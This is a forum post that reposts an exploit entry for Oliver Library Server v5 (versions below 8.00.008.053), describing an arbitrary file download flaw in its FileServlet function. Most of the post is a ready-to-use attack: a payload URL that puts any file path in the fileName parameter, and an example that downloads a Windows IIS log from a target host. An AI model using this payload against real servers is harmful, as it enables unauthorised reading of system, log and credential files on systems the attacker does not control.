This CHT Posted November 4, 2022 Group: The leader of the Content Count: 4,798 Achievement Points: 31,702 With Us For: 244 Days Status: Offline Last Seen: May 19 Device: Windows Share Posted November 4, 2022 # Exploit Title: Oliver Library Server v5 - Arbitrary File Download # Date: 14/12/2021 # Exploit Authors: Mandeep Singh, Ishaan Vij, Luke Blues, CTRL Group # Vendor Homepage: https://www.softlinkint.com/product/oliver/ # Product: Oliver Server v5 # Version: < 8.00.008.053 # Tested on: Windows Server 2016 Technical Description: An arbitrary file download vulnerability in Oliver v5 Library Server Versions < 8.00.008.053 via the FileServlet function allows for arbitrary file download by an attacker using unsanitized user supplied input. Steps to Exploit: 1) Use the following Payload: https://<hostaddress>/oliver/FileServlet?source=serverFile&fileName=<arbitrary file path> 2) Example to download iis.log file: https://<hostaddress>/oliver/FileServlet?source=serverFile&fileName=c:/windows/iis.log Link to comment Share on other sites More sharing options...
Recommended Posts